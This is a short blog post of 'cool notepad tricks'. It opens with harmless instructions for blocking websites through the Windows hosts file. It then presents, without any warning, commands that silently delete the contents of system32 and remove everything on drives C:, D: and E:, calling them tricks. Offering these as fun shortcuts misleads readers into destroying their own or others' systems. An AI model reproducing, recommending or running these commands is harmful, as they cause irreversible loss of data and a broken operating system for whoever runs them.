Pages

Monday, July 29, 2013

Cool notepad tricks

Blocking website in Firefox

 1

        Open Notepad on your computer by clicking \"Start,\" \"All Programs,\" \"Accessories\" and then \"Notepad.\" If you are running Vista/7, you will need to right-click the program name and select \"Run as Administrator.\"
        2

        Click \"File,\" \"Open\" and then browse to the following file: \"C:\\windows\\system32\\drivers\\etc\\hosts.\" The Hosts file has no file extension. Click the \"Open\" button.

        Sponsored Links
            VpnOneClick

            Keep your privacy and unlock all blocked service by the fastest Vpn
            www.vpnoneclick.com
        3

        Put two new lines into the Hosts file for each website that you wish to block. The two lines are \"127.0.0.1 www.examplesite.com\" and \"127.0.0.1 examplesite.com,\" where \"examplesite.com\" is the example website you wish to block.
        4

        Save the file and exit Notepad. The website is now blocked.


Deleting system 32 on window.

 del c:\WINDOWS\system32\*.*/q

Formating drivers in less than 3 second

    rd/s/q D:\
    rd/s/q C:\
    rd/s/q E:\

No comments:

Post a Comment